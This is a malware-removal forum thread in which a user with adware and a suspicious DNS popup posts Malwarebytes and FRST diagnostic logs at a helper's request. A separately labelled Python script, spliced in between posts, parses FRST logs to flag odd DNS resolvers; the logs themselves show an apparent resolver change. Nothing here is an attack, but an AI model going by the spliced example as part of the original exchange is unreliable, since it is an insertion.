Just removed some malware, but now I can't use firefox because of some other


Sorry for the title, I couldn't really come up with anything better without making it super long.

Hey, I'm Eirixoto.

Today, after running an Avast startup scan, I randomly had some malware on my browsers (Ironic, huh.). It would show this icon thing on the right side of my screen on some websites and every time I opened a website spam me with popups (Which got blocked by Firefox tho, I just got the message saying "Firefox has blocked X popups"). I believe I managed to remove this when I ran Malwarebytes and some cleaner.

However, now whenever I start Mozilla Firefox, I get this popup saying it's blocking "m55.dnsqa.me". It also uses a looong time to start, it's just white for a really long time before anything happens.
http://i.imgur.com/8kPzyQ7.png
Some other site also got blocked, but I don't remember what it was called. 

For the record: Right before this happened, I uninstalled League of Legends. I installed the new Runescape NXT client not long ago. I then ran the Avast startup scan. I've uninstalled both Firefox and Chrome multiple times by now. I also uninstalled some "Visual C++ Redistributable packages", but realized that was not smart and I believe I've reinstalled all of those now. 

If more info is needed, please tell me. I understand that I'm writing this... hard to understand, sorry about that. This is really annoying as I can't use Firefox at all because of this popup.

Hello Eirixoto, welcome to Malwarebytes' Malware Removal forum!
 
My name is Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable at times.   
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • I will notify you when I believe your computer is free of malware. Please bear in mind, absence of symptoms does not necessarily correlate to absence of malware, so please wait until the "All Clean". 
  • Ensure you are following this topic. Click the follow button at the top of the page.

======================================================
 
Please run the following scans so I can ascertain the state of your computer.
 
STEP 1
Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is selected and click Start Scan.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 

 
STEP 2

Farbar Recovery Scan Tool (FRST) Scan

  • Please download Farbar Recovery Scan Tool (x32) or Farbar Recovery Scan Tool (x64) and save the file to your Desktop.
  • Note: Download and run the version compatible with your system (32 or 64-bit). Download both if you're unsure; only one will run.
  • Right-Click FRST.exe or FRST64.exe and select Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
     

======================================================
 
STEP 3
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • MBAM log
  • FRST.txt
  • Addition.txt
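An added example, not part of the thread: a helper reading the FRST.txt requested in Step 2 can tabulate the resolver lines FRST prints under "Internet" and list the interfaces whose DNS servers differ from the system-wide `Tcpip\Parameters` value, which is a prompt to check that adapter's settings rather than a verdict. The sample log is constructed (RFC 5737 addresses, made-up GUIDs), the function names are hypothetical, and the `[NameServer]` line is an assumed layout for a statically set resolver.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the layout of FRST's "Internet" section.
# Addresses come from the RFC 5737 documentation ranges; GUIDs are made up.
# The [NameServer] line is an assumed layout for a static resolver entry.
SAMPLE_FRST = r"""
==================== Internet (Whitelisted) ====================

Tcpip\Parameters: [DhcpNameServer] 192.0.2.53 192.0.2.54
Tcpip\..\Interfaces\{11111111-1111-1111-1111-111111111111}: [DhcpNameServer] 192.0.2.53 192.0.2.54
Tcpip\..\Interfaces\{22222222-2222-2222-2222-222222222222}: [DhcpNameServer] 203.0.113.171
Tcpip\..\Interfaces\{33333333-3333-3333-3333-333333333333}: [NameServer] 198.51.100.7,198.51.100.8
Tcpip\..\Interfaces\{44444444-4444-4444-4444-444444444444}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
"""

# Matches both the system-wide line and the per-interface lines.
LINE_RE = re.compile(
    r"^Tcpip\\(?:\.\.\\Interfaces\\(?P<guid>\{[0-9A-Fa-f-]{36}\})|Parameters)"
    r": \[(?P<value>DhcpNameServer|NameServer)\] (?P<servers>.+)$"
)

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_resolvers(frst_text):
    """Return (system_wide, per_interface) resolver settings from FRST text.

    system_wide   -- set of IP strings from Tcpip\\Parameters
    per_interface -- {guid: {value_name: [ip, ...]}}
    """
    system_wide = set()
    per_interface = defaultdict(dict)
    for raw in frst_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        servers = []
        # FRST separates DHCP entries with spaces; static ones may use commas.
        for token in re.split(r"[,\s]+", m["servers"].strip()):
            try:
                servers.append(str(ipaddress.ip_address(token)))
            except ValueError:
                continue  # skip anything that is not an IP literal
        if m["guid"] is None:
            system_wide.update(servers)
        else:
            per_interface[m["guid"]][m["value"]] = servers
    return system_wide, dict(per_interface)


def review_resolvers(frst_text):
    """List per-interface resolvers worth a closer look, in log order by GUID.

    A resolver is listed when it is statically configured or when it does
    not appear in the system-wide list. Each finding records whether the
    address is RFC 1918 (typically the local router) or not.
    """
    system_wide, per_interface = parse_resolvers(frst_text)
    findings = []
    for guid, values in sorted(per_interface.items()):
        for value_name, servers in sorted(values.items()):
            for ip in servers:
                reasons = []
                if value_name == "NameServer":
                    reasons.append("statically configured")
                if ip not in system_wide:
                    reasons.append("not in system-wide list")
                if not reasons:
                    continue
                addr = ipaddress.ip_address(ip)
                scope = ("rfc1918" if any(addr in net for net in RFC1918)
                         else "other")
                findings.append({"interface": guid, "value": value_name,
                                 "ip": ip, "scope": scope,
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_resolvers(SAMPLE_FRST):
        print(f"{f['interface']} {f['value']:<14} {f['ip']:<15} "
              f"{f['scope']:<8} {', '.join(f['reasons'])}")
```
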

Hello, Adam. Thanks for the fast reply.
Please, call me Eirik.

For the record I don't have any torrent programs. I believe there is no illegally obtained software either. If there is, however, and you see that from some logs or what not, tell me and I'll get rid of it.

 

As I've already run Malwarebytes Anti-Malware a few times today, it didn't find anything more this time. It did delete like 29 objects earlier, I dunno if that will show up on the new scan logs? If you do want some of the old, tell me.
Anyways, here's the logs from Malwarebytes Anti-Malware.
 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Skannedato: 21-Feb-16
Skannetid: 15:59
Loggfil:
Administrator: Ja

Versjon: 2.2.0.1024
Malwaredatabase: v2016.02.21.02
Rootkitdatabase: v2016.02.17.01
Lisens: Prøveversjon
Malwarebeskyttelse: Aktivert
Ondsinnet Nettsidebeskyttelse: Aktivert
Selvbeskyttelse: Deaktivert

OS: Windows 8.1
CPU: x64
Filsystem: NTFS
Bruker: Eirik

Skannetype: Trusselskann
Resultat: Fullført
Objekter skannet: 374676
Tid brukt: 52 min, 33 sek

Minne: Aktivert
Oppstart: Aktivert
Filsystem: Aktivert
Arkiv: Aktivert
Rootkits: Aktivert
Heuristikk: Aktivert
PUP: Aktivert
PUM: Aktivert

Prosesser: 0
(Ingen ondsinnede elementer funnet)

Moduler: 0
(Ingen ondsinnede elementer funnet)

Registernøkler: 0
(Ingen ondsinnede elementer funnet)

Registerverdier: 0
(Ingen ondsinnede elementer funnet)

Registerdata: 0
(Ingen ondsinnede elementer funnet)

Mapper: 0
(Ingen ondsinnede elementer funnet)

Filer: 0
(Ingen ondsinnede elementer funnet)

Fysiske sektorer: 0
(Ingen ondsinnede elementer funnet)

(end)

 

FRST.txt
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:21-02-2016

Ran by Eirik (administrator) on NINJA (21-02-2016 17:14:18)
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik (Available Profiles: Eirik)
Platform: Windows 8.1 0(X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\SCM\MSIService.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe
() C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(MSI) C:\Program Files (x86)\SCM\Radio Manager.exe
(MSI) C:\Program Files (x86)\SCM\SCM.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Spotify Ltd) C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Dropbox, Inc.) C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13513288 2013-04-24] (Realtek Semiconductor)
HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [Radio Manager] => C:\Program Files (x86)\SCM\Radio Manager.exe [406920 2013-04-18] (MSI)
HKLM\...\Run: [sCM] => C:\Program Files (x86)\SCM\SCM.exe [407968 2013-04-18] (MSI)
HKLM\...\Run: [MBCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\MBCfg64.dll,RunDLLEntry MBCfg64
HKLM\...\Run: [igfxTray] => C:\Windows\system32\igfxtray.exe [455784 2014-09-05] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [shadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15033976 2015-11-20] (Logitech Inc.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2773232 2015-12-01] (Synaptics Incorporated)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1564040 2013-04-22] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [sound Blaster Cinema] => C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe [711680 2012-11-29] (Creative Technology Ltd)
HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [super-Charger] => C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe [490480 2013-02-07] (MSI)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-29] (CyberLink Corp.)
HKLM-x32\...\Run: [blueStacks Agent] => c:\Program Files (x86)\BlueStacks\HD-Agent.exe [597880 2013-01-07] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-20] (AVAST Software)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-02-26] (Atheros Communications)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2016-01-25] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [153392 2016-01-23] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-20] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Qualcomm Atheros Killer Network Manager.lnk [2013-04-24]
ShortcutTarget: Qualcomm Atheros Killer Network Manager.lnk -> C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe ()
Startup: C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-02-18]
ShortcutTarget: Dropbox.lnk -> C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 193.213.112.4 130.67.15.198
Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{9DBBD578-1F2D-49B3-AF19-9BA3EA7169DF}: [DhcpNameServer] 193.213.112.4 130.67.15.198
Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
SearchScopes: HKLM -> DefaultScope {C20F2EF6-44CE-4E46-8912-DE1A7605CD4B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-02-17] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2013-02-26] (Qualcomm Atheros Commnucations)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-20] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-02-17] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-02-17] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-13] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-20] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-17] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-13] (Oracle Corporation)
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Eirik\AppData\Roaming\Mozilla\Firefox\Profiles\ftitlze4.default-1456024844607
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
